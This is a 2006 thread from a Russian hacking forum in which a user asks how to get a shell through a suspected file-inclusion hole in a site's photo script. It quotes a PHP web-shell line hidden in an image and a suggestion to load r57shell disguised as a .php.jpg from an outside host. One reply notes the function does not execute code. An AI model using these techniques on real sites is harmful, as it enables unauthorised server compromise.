ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Как получить шелл?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как получить шелл?
  #1  
Старый 27.08.2006, 13:08
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию Как получить шелл?
Есть сайт:
http://www.site.com/includes/photo_display.php?photo=http
Вылетает ошибка:
------------------------------------------------------
Warning: getimagesize(http) [function.getimagesize]: failed to open stream: No such file or directory in /путь/includes/photo_display.php on line 8
------------------------------------------------------
Вроде как инклуд. Пытаюсь проклудть - не получается. Но когда загужаю картинку(jpg,gif):
http://www.site.com/includes/photo_display.php?photo=http://site.narod.ru/ris.jpg - появляется картинка.
Пробовал добавить дебагером в картинку <? passthru($cmd); ?> - шелл получить не получается.
Что делать? Как получить шелл?
 
Ответить с цитированием

  #2  
Старый 27.08.2006, 13:18
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию
хз =). попробуй пихнуть шелл примерно так
PHP код:
Http://www.site.com/includes/photo_display.php?photo=http://site.narod.ru/r57shell.php.jpg 
- думаю понятно, открываешь картинку и туда код php
в осле и опере пробуй этот метод. отпишись как прошло
помоему тут все просто
Последний раз редактировалось Sn@k3; 27.08.2006 в 13:20.. Причина: забыл дописать, раньше нажал
 
Ответить с цитированием

  #3  
Старый 27.08.2006, 13:23
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию
Попробуй вообще без расширений подставить, или с расширениями в разном регистре...
 
Ответить с цитированием

  #4  
Старый 27.08.2006, 13:31
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
getimagesize, function.getimagesize

эти слова должны натолкнуть вас, что инклуд пишется по другому... не верите??? просто проверьте.
Даже из названия можно понять что эта функция возвращает не исполненный удаленный код, а размеры удаленной (можно и локальной) картинки... это все.


не каждая ошибка в пхп класса Warning является инклудом
 
Ответить с цитированием

  #5  
Старый 27.08.2006, 14:15
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию
Сорри за флейм, но только щас заметил, что это ведь вроде как скрипт двига PHOTO Gallery ???
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Как получить доступ из Dos к файлам находящимся на диске с Ntfs TMI Soft - Windows 10 15.03.2006 22:20
Можно ли получить php шелл из админки phpbb 2.0.1x? [TSH]Corpse Форумы 6 07.03.2005 04:03
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ